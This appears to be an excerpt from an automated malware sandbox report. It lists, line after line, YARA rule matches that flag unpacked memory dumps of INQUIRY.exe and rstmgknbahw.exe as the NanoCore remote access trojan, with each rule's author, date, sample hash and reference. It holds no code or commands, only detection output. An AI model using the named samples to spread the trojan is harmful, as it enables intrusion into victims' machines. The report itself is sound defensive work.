      Source: 1.2.INQUIRY.exe.22f1458.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 1.2.INQUIRY.exe.22f1458.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 1.2.INQUIRY.exe.22f1458.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.INQUIRY.exe.2921548.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.INQUIRY.exe.2921548.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.INQUIRY.exe.39a98c0.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.INQUIRY.exe.39a98c0.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.2.rstmgknbahw.exe.2510000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.2.rstmgknbahw.exe.2510000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.2.rstmgknbahw.exe.2510000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.2.rstmgknbahw.exe.395543d.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.2.rstmgknbahw.exe.395543d.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.0.INQUIRY.exe.415058.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.0.INQUIRY.exe.415058.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.0.INQUIRY.exe.415058.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.INQUIRY.exe.39adee9.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.INQUIRY.exe.39adee9.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.2.rstmgknbahw.exe.6d8d50.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.2.rstmgknbahw.exe.6d8d50.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.2.rstmgknbahw.exe.6d8d50.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.2.rstmgknbahw.exe.28f68dc.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.2.rstmgknbahw.exe.28f68dc.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.2.rstmgknbahw.exe.2411458.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 5.2.rstmgknbahw.exe.2411458.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.2.rstmgknbahw.exe.2411458.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.2.rstmgknbahw.exe.381bfde.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.rstmgknbahw.exe.381bfde.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.2.rstmgknbahw.exe.381bfde.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.INQUIRY.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.INQUIRY.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.INQUIRY.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.INQUIRY.exe.24e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.INQUIRY.exe.24e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.INQUIRY.exe.24e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
